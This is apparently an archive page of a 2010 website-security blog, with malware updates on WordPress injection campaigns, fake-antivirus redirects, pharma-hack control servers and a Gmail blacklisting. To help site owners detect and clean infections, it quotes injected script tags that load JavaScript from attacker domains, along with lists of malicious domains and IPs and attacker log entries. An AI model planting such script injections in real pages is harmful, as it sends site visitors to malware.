Malware update – Alex Bodrov – awaue.com,etc

August 31, 2010 by 4 Comments

We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).

Read More

Filed Under: Malware, malware_updates Tagged With: ,

Hilary Kneber (part XI) – sippa.dottasink.net

August 24, 2010 by 3 Comments

Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:

< script src = "http://sippa.dottasink.net/music/indi.php”></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

Read More

Filed Under: hacked, Malware Tagged With: ,

More spam: Google-traffic-analytics.com C&C server

August 23, 2010 by 1 Comment

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Read More

Filed Under: hacked, pharma, Spam Tagged With: , ,

Gmail blacklisted by Spamhaus

August 19, 2010 by 16 Comments

Update: Gmail not blacklisted anymore.

It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor:

< OK: Host www.gmail.com clean.

> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.

Digging further:

$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23


Read More

Filed Under: blacklisted, gmail, Spam Tagged With: , ,

Pharma hack and their C&C (Command & control) server

August 12, 2010 by 13 Comments

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – - [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – - [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – - [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – - [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550


Read More

Filed Under: hacked, pharma, Spam, WordPress Tagged With: , , ,

Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group

August 5, 2010 by 8 Comments

If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Read More

Filed Under: bluehost, hacked, Malware Tagged With: , ,

Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)

August 4, 2010 by 7 Comments

Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only search engines.

This is how an affected site looks like on our scanner:



Read More

Filed Under: hacked, Malware, Spam, WordPress Tagged With: , , ,